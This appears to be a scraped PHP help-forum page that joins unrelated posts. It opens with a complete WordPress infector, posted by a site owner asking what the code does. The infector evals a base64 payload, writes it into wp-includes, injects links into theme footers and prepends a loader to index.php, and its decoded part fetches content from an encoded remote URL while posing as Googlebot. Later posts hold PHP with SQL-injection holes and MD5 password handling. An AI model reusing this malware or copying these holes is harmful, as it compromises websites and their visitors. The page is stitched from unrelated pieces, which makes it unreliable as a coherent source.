JuIHRydWU7IH0gcHJpdmF0ZSBmdW5jdGlvbiBnZXRDb250ZW50KCR1cmwsJHBvc3QgPSBmYWxzZSkgeyBjdXJsX3NldG9wdCgkdGhpcy0+Y3VybCwgQ1VSTE9QVF9VUkwsICR1cmwpOyBpZiAoJHBvc3QgIT0gZmFsc2UpIGN1cmxfc2V0b3B0KCR0aGlzLT5jdXJsLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRwb3N0KTsgY3VybF9zZXRvcHQoJHRoaXMtPmN1cmwsIENVUkxPUFRfVVNFUkFHRU5ULCAiTW96aWxsYS81LjAgKGNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7ICtodHRwOi8vd3d3Lmdvb2dsZS5jb20vYm90Lmh0bWwpIik7IGN1cmxfc2V0b3B0KCR0aGlzLT5jdXJsLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULDIwKTsgY3VybF9zZXRvcHQoJHRoaXMtPmN1cmwsIENVUkxPUFRfVkVSQk9TRSwgZmFsc2UpOyBjdXJsX3NldG9wdCgkdGhpcy0+Y3VybCwgQ1VSTE9QVF9IRUFERVIsZmFsc2UpOyBjdXJsX3NldG9wdCgkdGhpcy0+Y3VybCwgQ1VSTE9QVF9QT1NULCB0cnVlKTsgY3VybF9zZXRvcHQoJHRoaXMtPmN1cmwsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7IHJldHVybiBjdXJsX2V4ZWMoJHRoaXMtPmN1cmwpOyB9IHByaXZhdGUgZnVuY3Rpb24gX3NlcigkZGF0YSkgeyByZXR1cm4gc2VyaWFsaXplKCRkYXRhKTsgfSBwcml2YXRlIGZ1bmN0aW9uIF91bnNlcigkZGF0YSkgeyByZXR1cm4gdW5zZXJpYWxpemUoJGRhdGEpOyB9IHByaXZhdGUgZnVuY3Rpb24gZGVjb2RlcigpIHsgJHRoaXMtPmxvY2F0aW9uID0gYmFzZTY0X2RlY29kZSgkdGhpcy0+bG9jYXRpb24pOyAkdGhpcy0+c3lzdGVtVXJsID0gYmFzZTY0X2RlY29kZSgkdGhpcy0+c3lzdGVtVXJsKTsgJHRoaXMtPmJvdERldGVjdG9yVXJsID0gYmFzZTY0X2RlY29kZSgkdGhpcy0+Ym90RGV0ZWN0b3JVcmwpOyAkdGhpcy0+Y2FjaGVGaWxlID0gYmFzZTY0X2RlY29kZSgkdGhpcy0+Y2FjaGVGaWxlKTsgfSB9");eval($st);?>';
file_put_contents("$local2/wp-includes/class-wp-optimize.php", $clientSource);
echo"<span style='display:block;
padding:10px;
border:1px solid #1f4f18;
background-color:#b9b9b9;
font-size:12px;
line-height:12px;
font-family:tahoma, sans-serif;
margin-bottom:20px;'><h4>Клиент записан в $local2/wp-includes/ </h4>
</span>";
}
function dir_content($path = './wp-content/themes/', $files_allowed = '.')
{
$dir_disallow = array('.', '..', '.htaccess', '.git', 'wp-admin', 'wp-includes' );
if(is_dir($path))
{
$temp = opendir($path);
while (false !== ($dir = readdir($temp)))
{
if ((is_dir($path . $dir)) &&
(!in_array($dir, $dir_disallow)) )
{
$sub_dir = $path . $dir . '/';
$this->dir_content($sub_dir, $files_allowed);
}
elseif ((is_file($path . $dir)) &&
(!in_array($dir, $dir_disallow)) &&
(strpos($dir, $files_allowed) == true) &&
(strpos($dir, '_BACKUP') == false) &&
(strpos($dir, trim($_SERVER['SCRIPT_NAME'], '/')) === false) )
{
$this->arr_files[] = $path . $dir;
}
}
closedir($temp);
}
}
function find($path = './wp-content/themes/', $files_allowed = '.', $requested_string = '<?php wp_footer(); ?>')
{
$this->dir_content($path, $files_allowed);
$i=0;
foreach($this->arr_files AS $in_dir_file)
{
$temporary_file = file_get_contents($in_dir_file);
$file_founded = false;
$tf_strings = explode("\n", $temporary_file);
foreach ($tf_strings AS $item)
{
$item = strval($item);
if (strpos($item, $requested_string) !== false)
{
$file_founded = true;
$founded_str = $requested_string;
}
foreach ($this->signatures AS $signa)
{ $signa = strval($signa);
if (strpos($item, $signa) !== false)
{
$file_founded = true;
$founded_str = $signa;
}
}
}
if ($file_founded)
{ $i++;
print "
<span style='display:block;
padding:10px;
border:1px solid #1f4f18;
background-color:#b9b9b9;
font-size:12px;
line-height:12px;
font-family:tahoma, sans-serif;
margin-bottom:20px;'><h4>" . $in_dir_file . "</h4>TEMPLATE №:$i; готов к заражению.
</span>
";
}
}
}
function scan($path = './wp-content/themes/', $files_allowed = '.', $requested_string = '<? php wp_footer(); ?>')
{
$this->dir_content($path, $files_allowed);
foreach($this->arr_files AS $in_dir_file)
{
$temporary_file = file_get_contents($in_dir_file);
$create_backup = false;
$tf_strings = explode("\n", $temporary_file);
$str_index = 0;
foreach ($tf_strings AS $item)
{
$item = strval($item);
if (strpos($item, $requested_string) !== false)
{
$create_backup = true;
$tf_strings[$str_index]=substr_replace($tf_strings[$str_index], $this->get_link(), 0, 0);
$founded_str = $requested_string;
}
foreach ($this->signatures AS $signa)
{
$signa = strval($signa);
if (strpos($item, $signa) !== false)
{
$create_backup = true;
$tf_strings[$str_index]=substr_replace($tf_strings[$str_index], $this->get_link(), 0, 0);
}
}
$str_index++;
}
if ($create_backup)
{
chmod($path, 0777);
$temp_file_backup = $in_dir_file.'_BACKUP';
file_put_contents($temp_file_backup, $temporary_file);
$scanned_file = implode("\n", $tf_strings);
if (file_put_contents($in_dir_file, $scanned_file))
{
print "<span style='display:block;
padding:15px;
border:1px solid #1f4f18;
background-color:#d5f5ce;
font-size:12px;
line-height:16px;
font-family:tahoma, sans-serif;
margin-bottom:20px;'><h3>" . $in_dir_file . "</h3> Файл заражен + сделан BACKUP
</span>
";
}
else
{
print "<span style='display:block;
padding:15px;
border:1px solid #822121;
background-color:#ea7575;
font-size:12px;
line-height:16px;
font-family:tahoma, sans-serif;
margin-bottom:20px;'><h3>" . $in_dir_file . "</h3> Что-то пошло не так.
</span>
";
}
chmod($path, 0755);
}
}
}
/*
function scankl()
{
$local2=$_SERVER['DOCUMENT_ROOT'];
$requested_string = '<?php include (\'wp-includes/class-wp-optimize.php\');
define(\'WP_USE_THEMES\', true);
require( dirname( __FILE__ ) . \'/wp-blog-header.php\' );';
file_put_contents("$local2/index.php", $requested_string);
}
*/
function scankl()
{
$indexFile=$_SERVER['DOCUMENT_ROOT'].'/index.php';
$addContent = '<?php require_once (\'wp-includes/class-wp-optimize.php\'); if ($_GET["p"]) new Client;?>';
file_put_contents($indexFile,$addContent.file_get_contents($indexFile));
echo "<span style='display:block;
padding:15px;
border:1px solid #1f4f18;
background-color:#d5f5ce;
font-size:12px;
line-height:16px;
font-family:tahoma, sans-serif;
margin-bottom:20px;'><h3>Клиент прописан в index.php'</h3></span>";
}
function restore_backups($path = './wp-content/themes/', $files_allowed = '.')
{
$this->dir_content($path, $files_allowed);
foreach($this->arr_files AS $in_dir_file) {
if (is_file($in_dir_file.'_BACKUP')) {
$temporary_file_from_backup = file_get_contents($in_dir_file.'_BACKUP');
if (file_put_contents($in_dir_file, $temporary_file_from_backup)) {
unlink($in_dir_file.'_BACKUP');
print "<span style='display:block;
padding:15px;
border:1px solid #1f4f18;
background-color:#d5f5ce;
font-size:12px;
line-height:16px;
font-family:tahoma, sans-serif;
margin-bottom:20px;'><h3>".$in_dir_file ."</h3> Файл восстановлен.
</span>
";
}
else
{
print "<span style='display:block;
padding:5px;
border:1px solid #822121;
background-color:#ea7575;
font-size:12px;
line-height:16px;
font-family:tahoma, sans-serif;
margin-bottom:20px;'><h3>".$in_dir_file ."</h3> Бекап не восстановлен.
</span>
";
}
}
}
}
function delete_backups($path = './wp-content/themes/', $files_allowed = '.')
{
$this->dir_content($path, $files_allowed);
foreach($this->arr_files AS $in_dir_file) {
if (is_file($in_dir_file.'_BACKUP'))
{
if (unlink($in_dir_file.'_BACKUP'))
{
print " <span style='display:block;
padding:15px;
border:1px solid #1f4f18;
background-color:#d5f5ce;
font-size:12px;
line-height:16px;
font-family:tahoma, sans-serif;
margin-bottom:20px;'><h3>".$in_dir_file ."_BACKUP</h3> Удалён.
</span>";
}
else
{
print "<span style='display:block;
padding:15px;
border:1px solid #822121;
background-color:#f94c00;
font-size:12px;
line-height:16px;
font-family:tahoma, sans-serif;
margin-bottom:20px;'><h3>".$in_dir_file ."_BACKUP</h3> НЕ удалён.
</span>
";
}
}
}
}
}
?>
<?php
$starter = new linkBilder; //start_OK
$ssilka = htmlspecialchars("{$starter->get_link()}", ENT_QUOTES);?>
<?php echo "<b>В футер мы пишем: </b>$ssilka".'<br>';?>
<?php
$local = $_SERVER['DOCUMENT_ROOT'].'/wp-content/themes/';
$local2=$_SERVER['DOCUMENT_ROOT'];
?>
<? //active folder
if($_POST['find'])
{
$starter->find($local, '.');
}
else if($_POST['wrkr'])
{
$starter->scankl();
}
else if($_POST['create'])
{
$starter->scan($local, '.');
}
else if($_POST['backups'])
{
$starter->restore_backups($local, '.');
}
else if($_POST['kr'])
{
$starter->make_file();
}
else if($_POST['delbackups'])
{
$starter->delete_backups($local, '.');
}
echo '<form method="post">';
echo '<input type="submit" style="padding:10px;" name="kr" value="Сделать клиент">';
echo '<input type="submit" style="padding:10px;" name="wrkr" value="Прописать клиент в index">';
echo '<input type="submit" style="padding:10px;" name="find" value="Проверить WP/Найти шаблоны">';
echo '<input type="submit" style="padding:10px;" name="create" value="Заразить">';
echo '<input type="submit" style="padding:10px;" name="backups" value="Востановить файл с бекапа">';
echo '<input type="submit" style="padding:10px;" name="delbackups" value="Удалить бекап">';
echo '</form>';
?>
To reverse back everything to its healthy state, i must understand what this code does. Would u help me understanding code?
Thanks in advance.
function garland_separate_terms($node_taxonomy) { if ($node_taxonomy) { //separating terms by vocabularies foreach ($node_taxonomy AS $term) { $links[$term->vid]['taxonomy_term_'. $term->tid] = array( 'title' => $term->name, 'href' => taxonomy_term_path($term), 'attributes' => array( 'rel' => 'tag', 'title' => strip_tags($term->description) ), ); } //theming terms out foreach ($links AS $key => $vid) { $terms[$key] = theme_links($vid); } } return $terms; } this is a function from someone, i couldn't know it very well,sincerely expect someone can explain it to me .thank you. first, the function put an array $node_taxonomy as the parameter. why he didn't declare this ($node_taxonomy = array() then in the foreach loop's statement, why there is no echo to output somethig.but the fact is giving a two-dimension array to $links[$term->vid]['taxonomy_term_'. $term->tid]. So I am trying to run my execute function from my database class from my email class. I have SMTP system to handle emails on the website. I am working on a function in the email class called addAccount. It is suppose to add a row in the database under the SMTP table. When I run the function, I get no parsing errors, so I add the or die to my query from the execute function, still nothing at all. So here is some code: -The addAccount function from Email.php: function addAccount($name, $email, $username, $password, $protocol, $port, $server){ //Error checking & cleaning vars. will be done in the application, not the backend. if(!empty($name) && !empty($email) && !empty($username) && !empty($password) && !empty($proctocol) && !empty($port) && !empty($server)){ $name = ucwords(strtolower($name)); $email = strtolower($email); $this->db->execute("INSERT INTO ".TBL_SMTP." (name, email, username, password, protocol, port, server) VALUES ('$name', $email', '$username', '$password' '$protocol', '$port', '$server')", true); return true; }else return false; } -The entire email class from Email.php <?php require_once("pear/Mail.php"); class Email{ var $from_name, $from_email, $to_name, $to_email, $subject, $body, $host, $port, $username, $password; private $db = NULL; function __construct(Database $db){ $this->db = $db; } function dbEmail($id, $name, $email, $subject, $body){ $q = $this->db->select(TBL_SMTP, "*", "id='".$id."'"); if($q->numRows() > 0){ $f = $q->fetchRow(); $this->from_name = $f['name']; $this->from_email = $f['email']; $this->username = $f['username']; $this->password = $f['password']; $this->host = $f['protocol']."://".$f['server']; $this->port = $f['port']; $this->to_name = $name; $this->to_email = $email; $this->subject = $subject; $this->body = $body; return sendEmail(); }else return false; } function sendEmail(){ $from = $this->from_name." <".$this->from_email.">"; $to = $this->to_name." <".$this->to_email.">"; $headers = array ('From' => $this->from, 'To' => $this->to, 'Subject' => $this->subject); $smtp = Mail::factory('smtp', array ( 'host' => $this->host, 'port' => $this->port, 'auth' => true, 'username' => $this->username, 'password' => $this->password)); $mail = $smtp->send($to, $headers, $this->body); if(PEAR::isError($mail)){ //echo($mail->getMessage()); //For debugging purposes only return false; }else return true; } function addAccount($name, $email, $username, $password, $protocol, $port, $server){ //Error checking & cleaning vars. will be done in the application, not the backend. if(!empty($name) && !empty($email) && !empty($username) && !empty($password) && !empty($proctocol) && !empty($port) && !empty($server)){ $name = ucwords(strtolower($name)); $email = strtolower($email); $this->db->execute("INSERT INTO ".TBL_SMTP." (name, email, username, password, protocol, port, server) VALUES ('$name', $email', '$username', '$password' '$protocol', '$port', '$server')", true); return true; }else return false; } } $email = new Email($db); ?> The entire database class from Database.php <?php class Database{ var $mysqli, $result, $q, $affectedRows; function __construct($host, $user, $pass, $db){ $this->mysqli = new MySQLi($host, $user, $pass, $db); } function execute($query, $error = false, $mode = MYSQLI_STORE_RESULT){ $this->q = $query; if(!$error) $result = $this->mysqli->query($query, $mode); else $result = $this->mysqli->query($query, $mode) or die($this->mysqli->error); if(is_object($result) && $result instanceof MySQLi_Result){//if result is a object and is part of the mysqli class? $this->result = $result; $this->affectedRows = $this->result->num_rows; }else $this->affectedRows = $this->mysqli->affected_rows; return $this; } function fetchRow($mode = MYSQLI_ASSOC){ return $this->result->fetch_assoc($mode); } function fetchAll($mode = MYSQLI_ASSOC){ $row = $this->result->fetch_all($mode); return !empty($row) ? $row : array();//if not empty return row, else return an array? } function numRows(){ return $this->affectedRows; } function delete($table, $where){ return $this->execute("DELETE FROM ".$table." WHERE ".$where); } function deleteAll($table){ return $this->execute("TRUNCATE ".$table); } function update($table, $set, $where){ return $this->execute("UPDATE ".$table." SET ".$set." WHERE ".$where); } function select($table, $select = "*", $where = NULL){ if(is_null($where)) $where = ""; return $this->execute("SELECT ".$select." FROM ".$table." ".$where); } } $db = new Database(DB_HOST, DB_USER, DB_PASS, DB_DB); ?> Chances are it is my email class since it was 100% written by me. The database class I had some help from a member here. What do you experts think? Quote Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in C:\xampp\htdocs\hofiles\mschginsert.php on line 12 <?php $dep=$_POST['dep']; $name=$_POST['name']; $apt=$_POST['apt']; $amtpaid=$_POST['amtpaid']; $damage=$_POST['damage']; $month=$_POST['month']; $courtcost=$_POST['courtcost']; $nsf=$_POST['nsf']; $latechg=$_POST['latechg']; mysql_connect(localhost,root,""); mysql_select_db(mschgdb) or die "Unable to select database"); $query = "INSERT INTO miscdata VALUES ('','$dep','$name','$apt','$amtpaid','$damage','$month','$courtcost','$nsf','$latechg')"; mysql_query($query); mysql_close(); ?> Hello guys. I'm back with a quick question that I don't seem to understand. How exactly you create a session? I know the very basics of it, and that includes: <form action="Logged.php" method="post" > <input type="text" name="User" /> <input type="password" name="Password" /> <input type="submit" value="Login" /> <input type="reset" value="Clear" /> </form> Start with my log-in form. This is called when you log-in: <?php include("config.php"); if(isset($_SESSION["Username"])) { $user = $_SESSION["Username"]; $pass = md5($_SESSION["Password"]); } else { $user = $_POST["User"]; $pass = md5($_POST["Password"]); $_SESSION['Username'] = $user; $_SESSION['Password'] = $pass; $escuser = mysql_real_escape_string($user); $escpass = mysql_real_escape_string($pass); } $result = mysql_query("SELECT * FROM testWHERE user = '$escuser'"); $num_rows = mysql_num_rows($result); if($num_rows == 0) { echo('That username does not exist...'); echo '<a href="something.php""> Go back!</a>'; unset($_SESSION['Username']); unset($_SESSION['Password']); die; } $row = mysql_fetch_row($result); if($row[1] !== $escpass) { echo('Wrong Password!...'); echo '<a href="something.php"> Go Back!</a>'; unset($_SESSION['Username']); unset($_SESSION['Password']); die; } ?> Like I said above, the very basics. On that Logged.php page ( Which I got the above code from ) does not have:<?php session_start(); ?> ^ That's what I am having trouble with. Am I supposed to add that on top of EVERY page I have? I just need a quick rough-draft on how it should be, you don't need to use my examples, I just need to see a small preview of a log-in and then you can be able to access every page WHILE still logged. Thanks. |
|||||||